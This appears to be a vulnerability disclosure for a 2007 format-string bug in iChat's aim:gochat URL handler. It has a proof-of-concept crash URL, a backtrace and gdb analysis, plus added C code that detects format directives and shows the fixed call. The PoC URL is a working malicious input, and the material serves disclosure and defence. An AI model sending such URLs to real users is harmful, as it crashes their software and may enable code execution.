http://projects.info-pull.com/moab/bug-files/MOAB-20-01-2007.html
PoC URL:
aim:gochat?roomname=%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
Adium will probably try to handle it; I had to move it to the trash to hand aim:// to iChat.
Thread 0 Crashed:
0 com.apple.CoreFoundation 0x908110dc _CFStringAppendFormatAndArgumentsAux + 4934
1 com.apple.CoreFoundation 0x9080fc8c _CFStringCreateWithFormatAndArgumentsAux + 122
2 com.apple.Foundation 0x925e2a5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
3 com.apple.Foundation 0x92604670 -[NSString initWithFormat:arguments:] + 55
4 com.apple.iChat 0x000da226 0x1000 + 889382
5 com.apple.iChat 0x000bfbb6 0x1000 + 781238
6 libobjc.A.dylib 0x90a57c56 objc_msgSendv + 54
7 com.apple.Foundation 0x925fc43e -[NSInvocation invoke] + 932
8 com.apple.Foundation 0x9264974f -[NSConnection dispatchInvocation:] + 487
9 com.apple.Foundation 0x92694244 _NSHandleDORequest + 394
10 com.apple.Foundation 0x925f2c92 +[NSConnection doQueuedWork] + 436
11 com.apple.Foundation 0x925f2acd __NSPortDelegateTickler + 158
12 com.apple.CoreFoundation 0x9082a155 __CFRunLoopDoObservers + 342
13 com.apple.CoreFoundation 0x908291f7 CFRunLoopRunSpecific + 827
14 com.apple.CoreFoundation 0x90828eb5 CFRunLoopRunInMode + 61
15 com.apple.HIToolbox 0x92dcdb90 RunCurrentEventLoopInMode + 285
16 com.apple.HIToolbox 0x92dcd1ce ReceiveNextEventCommon + 184
17 com.apple.HIToolbox 0x92dcd0ee BlockUntilNextEventMatchingListInMode + 81
18 com.apple.AppKit 0x9326f465 _DPSNextEvent + 572
19 com.apple.AppKit 0x9326f056 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 137
20 com.apple.AppKit 0x93268ddb -[NSApplication run] + 512
21 com.apple.AppKit 0x9325cd2f NSApplicationMain + 573
22 com.apple.iChat 0x00002b6e 0x1000 + 7022
23 com.apple.iChat 0x0007e63d 0x1000 + 513597
NSInvocation is invoking:
(gdb) po $edx
<NSInvocation[0x4f5060] selector: service:chat:showError: signature: NSMethodSignature: types=Vv@:@@@ nargs=5 sizeOfParams=20 returnValueLength=0; >
(gdb) po [$edx target]
Service[AIM]
It passes arg1 along to the function at 0xda1db as well, which in turn does:
[[NSString alloc] initWithFormat: arg1 ...];
I'm digging to make sure there aren't other unsafe uses of arg1 within the call at the moment.
l64 = [NSBundle mainBundle];
l71 = [l64 localizedStringForKey: @"%@ error:"      // trusted format from the bundle
                           value: @""
                           table: 0];
l78 = [... shortName];
l87 = [NSString stringWithFormat: l71, l78];        // comments in the localization.strings
                                                    // suggest that l78 should be the service name.
And then comes the:
(void) (0xda1db)(l87, arg1, 0, 0, 0, 0)             // arg1 is the user-controlled string that
                                                    // 0xda1db then uses as its own format
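As an added illustration that is not part of the original post (written in C rather than Objective-C so it compiles stand-alone): a check that pulls the room name out of a gochat URL and counts the conversion directives it carries, beside the hardened form of the call, where the untrusted string is an argument to a fixed format, the printf analogue of stringWithFormat:@"%@", arg1. The sample URL and all function names are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample mirroring the shape of the PoC URL in the post. */
static const char kSampleUrl[] = "aim:gochat?roomname=%s%s%s%s";

/* Copy the value of the roomname= query parameter into out.
 * Returns the number of bytes copied, or -1 if the parameter is absent. */
static int extract_roomname(const char *url, char *out, size_t outsz)
{
    const char *p = strstr(url, "roomname=");
    if (p == NULL || outsz == 0)
        return -1;
    p += strlen("roomname=");
    size_t n = strcspn(p, "&#");          /* value ends at next parameter or fragment */
    if (n >= outsz)
        n = outsz - 1;                      /* truncate rather than overflow */
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}

/* Count printf-style conversion directives in untrusted text.
 * "%%" is a literal percent sign and is not counted. A non-zero result on a
 * string that is about to be used as a format is the condition to alert on. */
static int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {                  /* escaped percent, skip both */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

/* Hardened equivalent of the call at 0xda1db: the format is a fixed literal
 * and the room name is an argument, so its '%' characters are copied verbatim.
 * The bug on the page is the Cocoa analogue of snprintf(out, outsz, roomname),
 * where the untrusted string itself becomes the format. */
static int format_error_safe(char *out, size_t outsz,
                             const char *service, const char *roomname)
{
    return snprintf(out, outsz, "%s error: %s", service, roomname);
}
```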